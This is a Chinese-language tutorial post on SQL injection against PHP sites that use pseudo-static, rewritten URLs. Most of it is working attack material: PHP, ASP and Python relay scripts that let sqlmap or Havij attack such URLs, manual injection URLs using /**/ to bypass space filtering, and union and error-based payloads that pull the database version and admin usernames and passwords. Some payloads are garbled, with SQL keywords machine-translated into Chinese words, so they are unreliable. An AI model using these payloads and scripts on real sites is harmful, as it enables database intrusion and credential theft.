PHP針對偽靜態注入實例分享
- 小云云原創
- 2018-01-30 14:20:202004瀏覽
本文主要主要介紹PHP針對偽靜態的注入,結合實例形式總結分析了php針對偽靜態的常見注入情況,並附帶asp與Python的相關操作代碼,對於php程序安全有一定借鑒價值,需要的朋友可以參考下,希望能幫助大家。
一:轉注入法
1.透過http://www.xxx.com/news.php?id=1做了偽靜態之後就成這樣了
http://www.xxx.com/news.php/id/1.html
#2.測試步驟:
中轉注入的php程式碼:inject.php
<?php set_time_limit(0); $id=$_GET["id"]; $id=str_replace(” “,”%20″,$id); $id=str_replace(“=”,”%3D”,$id); //$url = "http://www.xxx.com/news.php/id/$id.html"; $url = "http://www.xxx.com/news.php/id/$id.html"; //echo $url; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
3.本機環境搭建PHP,然後造訪http://127.0.0.1/inject.php?id=1
透過sqlmap或是havj可以跑注入漏洞。
附錄ASP中轉程式碼:
<%
JmdcwName=request("id")
JmStr=JmdcwName
JmStr=URLEncoding(JmStr)
JMUrl="http://192.168.235.7:8808/ad/blog/" //实际上要请求的网址
JMUrl=JMUrl & JmStr&".html" //拼接url
response.write JMUrl&JmStr //我这里故意输出url来看
'JmRef="http://127.0.0.1/6kbbs/bank.asp"
JmCok=""
JmCok=replace(JmCok,chr(32),"%20")
JmStr=URLEncoding(JmStr)
response.write PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串,cookie,referer字段
Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn) //处理返回的信息
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
Function URLEncoding(vstrin) //发包前对参数的url编码一下
strReturn=""
Dim i
'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符,
'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
'vstrin=Replace(vstrin,chr(43),"%2B") 'JMDCW增加转换+字符
vstrin=Replace(vstrin,chr(32),"/**/") '在此增加要过滤的代码 //这里很关键,方便啊,把空格自动换成/**/,后面会说到的
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
URLEncoding=strReturn
End Function
%>#二、手動注入法
1.http://www.xxx.com/play/Diablo.html
http://www.xxx.com/down/html/?772.html
2.測試注入:
http://www.xxx.com/down/html/?772′.html
http://www.xxx.com /play/Diablo'.html
http:// www.xxx.com/play/Diablo'/**/和###/**/1='1 /*.html
#http://www.xxx.com/play/Diablo'
/**/和###/**/1='2 /*.html
http://www.xxx.com/page/html/?56′/**/和/**/1=1/*.html 正常
http://www.xxx.com/page/html/?56′/**/和/**/1=2/*.html 出錯
3.看頁面是否有差異,相同則不存在,不同存在註入。
4.聯合查詢:
http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1. html
http://www.xxx.com/page/html/?56'/**/和/**/(SELECT/**/1/**/(選擇/**/從/**/count(* ),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/團體/**/a)b)=1/*.html「手動注入法(二)http://www.xxx.net /news/html/?410.html
http://www.xxx.net/news/html/?410'union/**/1/**/(選擇/**/concat(用戶名,0x3a,密碼)/**/select/**/pwn_base_admin/**/0,1),0x3a)a/**/information_schema.tables/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/經過/**/where'1'='1.html
註:
偽靜態的注入和URL的普通GET注入不太相同
。普通url的get注入的%20,%23,+等都可以用;但是偽靜態不行,會直接傳遞到url中,所以用/**&*/limit/**&*&*&*&*&*/a)b/**&*/這個註解符號表示空格。 www.cunlide.com/id1/1/id2/2
python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″#http://www .xxx.com/news/class/?103.htm
python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”#四、python腳本方法
#程式碼:
from BaseHTTPServer import *
import urllib2
class MyHTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
path=self.path
path=path[path.find('id=')+3:]
proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})
opener = urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"
try:
response=urllib2.urlopen(url+path)
html=response.read()
except urllib2.URLError,e:
html=e.read()
self.wfile.write(html)
server = HTTPServer(("", 8000), MyHTTPHandler)
server.serve_forever()相關推薦:
以上是PHP針對偽靜態注入實例分享的詳細內容。更多資訊請關注PHP中文網其他相關文章!